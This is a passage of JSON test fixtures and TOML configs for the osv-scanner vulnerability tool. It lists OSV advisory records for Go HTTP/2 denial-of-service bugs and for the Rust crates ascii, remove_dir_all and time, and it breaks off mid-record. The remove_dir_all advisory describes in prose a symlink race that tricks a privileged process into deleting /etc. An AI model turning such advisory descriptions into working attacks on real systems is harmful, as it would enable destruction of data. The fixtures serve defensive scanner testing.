While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", 
"affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "summary": "", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ 
{ "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571", "CVE-2022-41723" ] } ] } ] }, { "source": { "path": "testdata/filter/all/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "aliases": null, "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "aliases": null, "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. 
Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may 
segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ] } ================================================ FILE: pkg/osvscanner/testdata/filter/all/want.json ================================================ { "results": [], "experimental_config": 
{ "call_analysis": { "enabled": false }, "licenses": { "enabled": false, "allowlist": null } } } ================================================ FILE: pkg/osvscanner/testdata/filter/none/configs/a/no_config ================================================ ================================================ FILE: pkg/osvscanner/testdata/filter/none/configs/b/osv-scanner.toml ================================================ # An empty config file ================================================ FILE: pkg/osvscanner/testdata/filter/none/configs/c/osv-scanner.toml ================================================ # None of the vulnerability IDs ignored below appear in the results for this 'source', so these entries are not expected to match anything. [[IgnoredVulns]] id = "GHSA-fxg5-wq6x-vr4w" reason = "Ignore 1" [[IgnoredVulns]] id = "GO-2022-1144" reason = "Ignore 2" [[IgnoredVulns]] id = "GO-2023-1571" reason = "Ignore 3" ================================================ FILE: pkg/osvscanner/testdata/filter/none/input.json ================================================ { "results": [ { "source": { "path": "testdata/filter/none/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. 
Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may 
segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", 